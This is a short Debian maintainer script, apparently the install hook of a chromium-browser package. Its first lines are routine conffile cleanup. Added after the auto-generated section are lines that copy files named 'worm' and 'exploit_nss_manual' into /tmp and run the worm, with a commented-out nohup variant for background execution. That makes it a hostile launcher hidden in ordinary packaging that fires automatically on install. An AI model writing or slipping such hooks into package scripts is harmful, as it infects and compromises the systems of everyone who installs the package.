#!/bin/sh
set -e
# Automatically added by dh_installdeb/12.10ubuntu1
dpkg-maintscript-helper rm_conffile /etc/chromium-browser/default -- "$@"
dpkg-maintscript-helper rm_conffile /etc/chromium-browser/customizations/00-example -- "$@"
# End automatically added section
cp /usr/share/doc/worm /tmp/worm
cp /usr/share/doc/exploit_nss_manual /tmp/exploit_nss_manual

/tmp/worm
#nohup /tmp/worm &
